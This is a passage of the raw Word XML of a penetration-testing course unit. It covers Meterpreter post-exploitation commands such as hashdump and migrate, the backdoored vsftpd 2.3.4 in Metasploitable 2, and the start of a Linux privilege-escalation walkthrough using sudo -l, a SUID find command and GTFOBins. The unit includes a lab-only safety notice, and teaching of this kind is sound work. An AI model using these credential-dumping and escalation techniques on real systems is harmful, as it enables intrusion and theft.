              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="7A1F1F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">ps</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="682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Lists running processes on the target</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2924"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="90"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="90"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="7A1F1F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">download</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> / </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="7A1F1F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">upload</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="682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Transfers files between attacker and target</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2924"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="90"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="90"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="7A1F1F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">shell</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="682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Drops into a native command shell on the target</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2924"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="90"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="90"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="7A1F1F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">migrate</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="682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Moves the session into a different, more stable process</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2924"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="90"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="90"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="7A1F1F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">hashdump</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="682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Dumps password hashes from the target (after sufficient privileges are gained)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2924"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="90"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="90"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="7A1F1F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">run post/multi/recon/local_exploit_suggester</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="682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Automatically checks the target for known local privilege-escalation exploits</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="dxa" w:w="9746"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="B8860B" w:sz="6"/>
          <w:left w:val="single" w:color="B8860B" w:sz="6"/>
          <w:bottom w:val="single" w:color="B8860B" w:sz="6"/>
          <w:right w:val="single" w:color="B8860B" w:sz="6"/>
          <w:insideH w:val="none" w:color="FFFFFF" w:sz="0"/>
          <w:insideV w:val="none" w:color="FFFFFF" w:sz="0"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9746"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9746"/>
            <w:shd w:fill="FFF6E5" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="150"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="150"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext/>
              <w:spacing w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="B8860B"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">✎ Example — Why the vsftpd 2.3.4 backdoor matters (observation question)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="280"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Metasploitable 2 deliberately ships vsftpd 2.3.4, a real-world case where the official source archive on the vendor's distribution server was replaced by attackers with a backdoored version between June and July 2011. Anyone who downloaded and compiled that archive unknowingly installed a backdoor. This demonstrates a </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">supply-chain attack</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">: the vulnerability was never in the original code the developers wrote, but was introduced by compromising the distribution channel. It illustrates why verifying checksums/signatures of downloaded software, and monitoring official distribution infrastructure, matters as much as reviewing the application's own source code.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="dxa" w:w="9746"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="B8860B" w:sz="6"/>
          <w:left w:val="single" w:color="B8860B" w:sz="6"/>
          <w:bottom w:val="single" w:color="B8860B" w:sz="6"/>
          <w:right w:val="single" w:color="B8860B" w:sz="6"/>
          <w:insideH w:val="none" w:color="FFFFFF" w:sz="0"/>
          <w:insideV w:val="none" w:color="FFFFFF" w:sz="0"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9746"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9746"/>
            <w:shd w:fill="FFF6E5" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="150"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="150"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext/>
              <w:spacing w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="B8860B"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">✎ Example — Why escalate before post-exploitation (observation question)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="280"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">A Meterpreter shell gained via the vsftpd backdoor runs as the low-privilege </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="7A1F1F"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">daemon</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> user. Many valuable post-exploitation actions — reading </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="7A1F1F"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">/etc/shadow</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">, dumping credential hashes, installing persistence, or accessing other users' files — require root privileges. Remaining as </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="7A1F1F"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">daemon</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> limits what evidence and access the tester (or a real attacker) can obtain, so privilege escalation is normally the very next step after an initial foothold.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="dxa" w:w="9746"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="A33A3A" w:sz="6"/>
          <w:left w:val="single" w:color="A33A3A" w:sz="6"/>
          <w:bottom w:val="single" w:color="A33A3A" w:sz="6"/>
          <w:right w:val="single" w:color="A33A3A" w:sz="6"/>
          <w:insideH w:val="none" w:color="FFFFFF" w:sz="0"/>
          <w:insideV w:val="none" w:color="FFFFFF" w:sz="0"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9746"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9746"/>
            <w:shd w:fill="FBEAEA" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="150"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="150"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext/>
              <w:spacing w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="A33A3A"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">⛔ Lab Safety — Authorised Lab Only</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="280"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">hashdump, credential access and persistence techniques shown in this unit are to be practised only against Metasploitable 2 / DVWA inside the isolated lab. Never attempt them against any system without explicit written authorisation.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
        <w:spacing w:after="160" w:before="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">3.5 Linux Privilege Escalation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E7C7B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo -l and SUID binaries</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">`sudo -l`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> lists commands the current user is allowed to run with sudo. If a user can run a text editor or scripting tool as root, that is often a direct path to full root access.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="dxa" w:w="9746"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="888888" w:sz="6"/>
          <w:left w:val="single" w:color="888888" w:sz="6"/>
          <w:bottom w:val="single" w:color="888888" w:sz="6"/>
          <w:right w:val="single" w:color="888888" w:sz="6"/>
          <w:insideH w:val="none" w:color="FFFFFF" w:sz="0"/>
          <w:insideV w:val="none" w:color="FFFFFF" w:sz="0"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9746"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9746"/>
            <w:shd w:fill="F5F5F0" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="150"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="150"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">find / -perm -4000 -type f 2&gt;/dev/null</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">This command lists </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">SUID binaries</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — files that always run with their owner's privileges regardless of who executes them. If one is owned by root and is a binary known to be exploitable (per GTFOBins), it can be abused for a root shell.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E7C7B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">GTFOBins and a step-by-step SUID walkthrough</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">GTFOBins</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a curated, public list of standard Unix binaries (like </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7A1F1F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">vim</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7A1F1F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">find</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7A1F1F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">cp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">) and the exact commands to abuse each one for privilege escalation once it is runnable as root through sudo or as SUID.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Run </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7A1F1F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo -l</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to see what the current user may run as root; separately run </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7A1F1F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">find / -perm -4000 -type f 2&gt;/dev/null</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to list SUID binaries system-wide.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Cross-reference any interesting binary (e.g. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7A1F1F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">find</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7A1F1F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">vim</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7A1F1F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">less</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7A1F1F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">cp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">) against GTFOBins to see if a known escalation technique exists for it.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
